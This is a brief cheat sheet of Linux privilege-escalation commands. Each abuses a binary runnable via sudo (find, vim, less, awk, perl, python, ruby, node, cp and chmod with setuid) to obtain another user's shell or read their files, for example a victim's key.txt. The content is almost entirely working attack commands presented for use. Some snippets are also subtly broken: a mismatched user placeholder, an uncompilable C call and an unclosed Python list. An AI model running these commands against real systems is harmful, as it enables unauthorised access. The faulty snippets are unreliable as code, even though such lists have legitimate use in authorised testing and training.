Privilege Escalations
Using find’s -exec parameter
sudo -u \<user-that-can-run-vim\> find / -name example -exec !/bin/bash \;
Using vim
sudo -u <user-that-can-run-vim> vim . Then run :!/bin/bash inside vim to get a shell.
Using less
sudo -u <user-that-can-run-less> less . Then run :!/bin/bash inside less to get a shell.
Using awk
sudo -u <user-that-can-run-awk> awk 'BEGIN {system("/bin/bash")}'
Using setuid or setgid (chmod and cp)
-
Write a c program like below
int main(){system(cat "/usr/home/file.txt");}
-
Compile it using
gcc -o foo foo.c. -
Since
cpcan be run, usesudo -u <user-that-can-run-cp> cp foo /tmp/foo1. -
After copying, the owner of the file
foo1becomes<user-that-can-run-cp>. -
Change file permission using
sudo -u <user-that-can-run-chmod> chmod +xs foo1 -
Run the file using
./foo1.
Using perl
sudo -u <user-that-can-run-perl> perl -e '`/bin/bash`'
!!!Use single quotes only. not double quotes!!!
Using python
sudo -u <user-that-can-run-python> python>>> from subprocess import callcall(['/bin/bash')- Shell for
<user-that-can-run-python>attained.
Using ruby
sudo -u <user-that-can-run-ruby> /usr/bin/ruby -e 'require "irb" ; IRB.start(__FILE__)'- This will open an interactive ruby environment (
irb(main):001:0>). Now type`/bin/bash`
Using node
node -e
var exec = require('child_process').exec; exec('[COMMAND]', function (error, stdOut, stdErr) { console.log(stdOut); });
where [COMMAND] is the command that need to be executed.
sudo -u victim node -e ‘var exec = require(“child_process”).exec; exec(“cat /home/victim/key.txt”, function (error, stdOut, stdErr) { console.log(stdOut); });’